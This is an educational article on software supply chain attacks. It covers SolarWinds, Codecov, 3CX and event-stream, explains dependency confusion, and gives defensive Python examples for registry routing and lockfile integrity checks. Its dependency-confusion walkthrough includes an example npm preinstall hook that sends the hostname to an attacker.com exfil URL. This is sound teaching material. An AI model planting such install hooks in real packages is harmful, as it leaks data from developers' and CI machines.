Supply Chain Attacks: Compromising the Source

Why hack one target when you can hack the software they trust? Supply chain attacks compromise software before it reaches victims - affecting thousands of organizations through a single intrusion. These are among the most sophisticated and impactful attacks.

The Supply Chain Concept

Software Supply Chain Attack Surface
┌─────────────────────────────────────────────────────────────────────────────┐
│                    SOFTWARE SUPPLY CHAIN                                     │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                             │
│   DEVELOPMENT          BUILD              DISTRIBUTION        DEPLOYMENT    │
│   ───────────          ─────              ────────────        ──────────    │
│                                                                             │
│   ┌─────────┐        ┌─────────┐        ┌─────────┐        ┌─────────┐    │
│   │ Source  │───────►│  CI/CD  │───────►│ Package │───────►│ Customer│    │
│   │ Code    │        │ Pipeline│        │ Registry│        │ Install │    │
│   └─────────┘        └─────────┘        └─────────┘        └─────────┘    │
│        │                  │                  │                  │          │
│        ▼                  ▼                  ▼                  ▼          │
│   ATTACK VECTORS:                                                          │
│   ├── Compromise dev    ├── Inject into    ├── Typosquatting  ├── MitM    │
│   │   credentials       │   build scripts  │   packages        │   updates │
│   ├── Malicious         ├── Poison build   ├── Dependency      ├── Rogue  │
│   │   commits           │   dependencies   │   confusion       │   mirrors │
│   └── Insider threat    └── Compiler       └── Account         └── Fake   │
│                             trojans            hijacking           patches │
│                                                                             │
│   NOTABLE EXAMPLES:                                                         │
│   ├── SolarWinds (build system)                                            │
│   ├── Codecov (CI/CD script)                                               │
│   ├── event-stream (npm package)                                           │
│   ├── 3CX (build compromise)                                               │
│   └── PyPI/npm typosquatting (ongoing)                                     │
│                                                                             │
└─────────────────────────────────────────────────────────────────────────────┘
                    

Major Supply Chain Attacks

SolarWinds SUNBURST (2020)

One of the most sophisticated supply chain attacks publicly known. APT29, attributed by the US government to Russia's SVR, compromised SolarWinds' build system and inserted a backdoor (SUNBURST) into the Orion IT monitoring platform. Up to 18,000 organizations downloaded the trojanized update; a much smaller set was selected for follow-on hands-on-keyboard activity.

Attack Chain

  1. Attackers gained access to SolarWinds' build environment
  2. A build-time implant (later named SUNSPOT) swapped a malicious source file into the Orion build while it compiled, so the code never appeared in the repository
  3. The backdoor lay dormant for up to two weeks after installation
  4. It checked for security tools and analysis environments before activating, and stayed silent if it found them
  5. C2 traffic went to DGA-generated subdomains of avsvmcloud.com and mimicked the legitimate Orion Improvement Program protocol
  6. Victims included the US Treasury, DHS, Microsoft and FireEye (whose own investigation uncovered the campaign)

Codecov (2021)

Attackers used a flaw in Codecov's Docker image creation process to obtain a credential, then modified the Bash Uploader script that customers fetched and executed inside CI. The altered script sent CI environment variables (tokens, keys and other secrets) to an attacker-controlled server. The change went unnoticed from 31 January to 1 April 2021, exposing secrets from the pipelines of Codecov's roughly 29,000 customers. Any script fetched over the network and piped straight into a shell on every build is an unpinned dependency and should be checked against a known hash before it runs.

3CX (2023)

The 3CX desktop VoIP application was trojanized through a compromise of 3CX's own build environment. Mandiant traced the initial access to an earlier supply chain attack: a 3CX employee had installed a backdoored version of Trading Technologies' X_TRADER software. It was the first publicly documented case of one supply chain compromise being used to seed another.

event-stream / npm (2018)

The original maintainer of event-stream (around 2M weekly downloads) handed the package to a volunteer who had offered to help maintain it. The new maintainer added a dependency, flatmap-stream, and later pushed a version containing obfuscated code that targeted the Copay Bitcoin wallet's build and stole wallet credentials. It showed how easily trust in an unpaid open source maintainer can be exploited.

Types of Supply Chain Attacks

Build System Compromise

Inject malicious code during compilation/packaging. Code appears legitimate in source control.

Example: SolarWinds, 3CX

Dependency Confusion

Register malicious packages with same names as internal packages on public registries.

Example: Alex Birsan's research (over $130k in bug bounties)

Typosquatting

Register packages with names similar to popular ones (e.g., "reqeusts" vs "requests").

Example: Ongoing on PyPI, npm, RubyGems

Account Takeover

Compromise maintainer accounts (stolen credentials, hijacked e-mail domains, or social engineering of a maintainership handover) to push malicious updates to legitimate packages.

Example: ua-parser-js (maintainer's npm account hijacked, 2021); event-stream (maintainership voluntarily handed over)

Dependency Confusion Attack

Demonstrated at scale by Alex Birsan in 2021. Exploits how package managers resolve a dependency when both a public and a private registry are consulted for the same name.

How Dependency Confusion Works
# Company has an internal package: company-utils v1.0.0
# It is listed in package.json but hosted only on the private registry

# Attacker publishes a package with the same name on public npm, using a
# version number far higher than anything the company will ever ship.
# Attacker's package.json: "name": "company-utils", "version": "99.0.0"
npm publish

# When a developer or CI runner runs: npm install
# A resolver that consults both registries (a proxy/virtual repo that merges
# upstream results, or pip with --extra-index-url) sees:
#   - Private: company-utils@1.0.0
#   - Public:  company-utils@99.0.0
# Highest version wins → malicious package installed

# The attacker's package.json runs code at install time, before any review:
"scripts": {
  "preinstall": "curl https://attacker.com/exfil?host=$(hostname)"
}
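
A toy resolver that models the two behaviours above, added here as an example and not code from the original page or from any real package manager. The index contents, the registry names ("private", "public") and the package names are constructed. resolve_merged consults every index and takes the highest version, which is what pip does with --extra-index-url and what a proxy that merges upstream results does; resolve_routed lets the name alone choose one registry, which is how an .npmrc @scope:registry mapping or a pip configuration with only --index-url behaves.

```python
"""Added example (not from the original page): a toy model of how a package
resolver chooses between a private and a public registry, and why scoping or
single-index routing closes the dependency-confusion gap. Index contents,
registry names and package names are constructed for the demonstration."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Resolved:
    name: str
    version: str
    registry: str


def parse_version(v: str) -> tuple:
    """Numeric tuple so '99.0.0' sorts above '1.0.0' (pre-release tags ignored)."""
    return tuple(int(p) for p in v.split("."))


# Constructed registry contents. "private" is the company's own registry,
# "public" stands for npmjs.org / PyPI. The attacker has already published
# company-utils@99.0.0 to the public registry.
INDEXES = {
    "private": {"company-utils": ["1.0.0"], "@company/internal-utils": ["1.0.0"]},
    "public": {"company-utils": ["99.0.0"], "lodash": ["4.17.20", "4.17.21"]},
}


def resolve_merged(name: str, indexes=INDEXES) -> Resolved:
    """Vulnerable behaviour: every index is consulted and the highest version
    wins, regardless of where it came from. This is what pip does with
    --extra-index-url and what an artifact proxy does when it merges upstreams."""
    candidates = [
        Resolved(name, v, reg)
        for reg, pkgs in indexes.items()
        for v in pkgs.get(name, [])
    ]
    if not candidates:
        raise LookupError(f"{name} not found in any index")
    return max(candidates, key=lambda c: parse_version(c.version))


def resolve_routed(name: str, default_registry: str,
                   scope_registries=None, indexes=INDEXES) -> Resolved:
    """Mitigated behaviour: the package name alone decides which single index is
    consulted. Scoped names (@company/...) are routed by .npmrc-style
    '@scope:registry' mappings; everything else goes to the default registry.
    Only that one index is searched, so a public lookalike is never a candidate."""
    scope_registries = scope_registries or {}
    scope = name.split("/", 1)[0] if name.startswith("@") else None
    registry = scope_registries.get(scope, default_registry)
    versions = indexes[registry].get(name, [])
    if not versions:
        # Fail closed: an unknown name is an error, not a reason to try another index.
        raise LookupError(f"{name} not found in {registry}")
    return Resolved(name, max(versions, key=parse_version), registry)


if __name__ == "__main__":
    print(resolve_merged("company-utils"))                 # public 99.0.0: confused
    print(resolve_routed("company-utils", "private"))      # private 1.0.0
    print(resolve_routed("@company/internal-utils", "public",
                         {"@company": "private"}))         # private 1.0.0 via scope
```

The routed resolver also shows why claiming the scope on the public registry still matters: if the default registry is public and no scope mapping exists, the lookup fails rather than silently falling back, which is the safe outcome, but only if nobody else can publish under that scope.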

High-Value Targets

Birsan's research ran code inside the build and install pipelines of Apple, Microsoft, PayPal, Shopify, Netflix, Tesla, Uber, and dozens more using this technique. He reported each case for a bug bounty rather than exploiting it, and most of the companies paid.

Defending Against Supply Chain Attacks

Build Security

  • Isolated build environments
  • Reproducible builds
  • Code signing verification
  • Build artifact attestation
  • SLSA framework compliance

Dependency Management

  • Pin exact versions (no ranges)
  • Use lockfiles
  • Private registry priority
  • Namespace/scope packages
  • SCA tools (Snyk, Dependabot)

Dependency Confusion Mitigations
# npm - Use scoped packages, and claim the scope (org) on the public registry
@company/internal-utils  # Once you own @company on npmjs.org, nobody else can publish under it

# pip - Point at the private index only with --index-url. Never add the public
# index with --extra-index-url: pip then considers both and takes the highest version
pip install --index-url https://private.company.com/simple/ package

# Register placeholder packages on public registries
# Claim your internal package names before attackers do

# .npmrc - Route scoped packages to the private registry
@company:registry=https://npm.company.com/
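
The build-security and dependency-management controls above all come down to comparing what arrives against something recorded in advance. The following Python, added here as an example rather than code from the original page or from npm, checks a downloaded tarball against the integrity field that package-lock.json records for it, and gates a fetched installer script on a pinned SHA-256, the check that would have caught a modified Codecov-style uploader. The package names, lockfile, tarball bytes and registry URL are constructed for the demonstration, and the helper names are this example's own.

```python
"""Added example (not from the original page): verify what a build is about to
install or execute against a digest recorded in advance, instead of trusting
whatever the network returned. Covers (a) the Subresource-Integrity style
'integrity' field that package-lock.json stores per package, and (b) a pinned
SHA-256 for a fetched installer script. All inputs are constructed fixtures."""
import base64
import hashlib
import hmac
import json

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(data: bytes, algo: str = "sha512") -> str:
    """Compute an SRI string ('<algo>-<base64 digest>') in the form npm stores it."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(data: bytes, integrity: str) -> bool:
    """True only if data matches the recorded integrity string (constant-time compare).
    Unknown or weak algorithms are rejected rather than trusted."""
    algo, sep, _ = integrity.partition("-")
    if not sep or algo not in SRI_ALGORITHMS:
        return False
    return hmac.compare_digest(sri_hash(data, algo), integrity)


def verify_lock_entry(lock_text: str, pkg_path: str, tarball: bytes) -> bool:
    """Check a downloaded tarball against its lockfile entry before unpacking it.
    Uses the lockfileVersion 2/3 'packages' map, keyed by node_modules path."""
    entry = json.loads(lock_text)["packages"].get(pkg_path)
    if not entry or "integrity" not in entry:
        return False  # unpinned dependency: refuse rather than trust the registry
    return verify_sri(tarball, entry["integrity"])


def verify_pinned_sha256(blob: bytes, pinned_hex: str) -> bool:
    """Gate for 'curl ... | bash' style installers: run the script only if its
    SHA-256 equals the value reviewed and committed alongside the pipeline."""
    return hmac.compare_digest(hashlib.sha256(blob).hexdigest(), pinned_hex.lower())


# Constructed fixtures: a fake tarball, a lockfile that pins it, and a tampered copy.
GOOD_TARBALL = b"\x1f\x8b" + b"company-utils-1.0.0 contents"
TAMPERED_TARBALL = GOOD_TARBALL + b"\n# preinstall: curl attacker"
LOCKFILE = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "node_modules/company-utils": {
            "version": "1.0.0",
            "resolved": "https://npm.company.com/company-utils/-/company-utils-1.0.0.tgz",
            "integrity": sri_hash(GOOD_TARBALL),
        },
        "node_modules/unpinned-pkg": {"version": "2.0.0"},  # no integrity field
    },
})

if __name__ == "__main__":
    print(verify_lock_entry(LOCKFILE, "node_modules/company-utils", GOOD_TARBALL))      # True
    print(verify_lock_entry(LOCKFILE, "node_modules/company-utils", TAMPERED_TARBALL))  # False
    print(verify_lock_entry(LOCKFILE, "node_modules/unpinned-pkg", GOOD_TARBALL))       # False
```

The lockfile check is only as good as the lockfile's provenance: commit it, review changes to integrity and resolved fields like code, and install with npm ci so a drifted package.json cannot silently regenerate it.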

MITRE ATT&CK Mapping

Initial Access

  • T1195 - Supply Chain Compromise
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1195.002 - Compromise Software Supply Chain

Execution

  • T1072 - Software Deployment Tools
  • T1059 - Command and Scripting Interpreter

Further Reading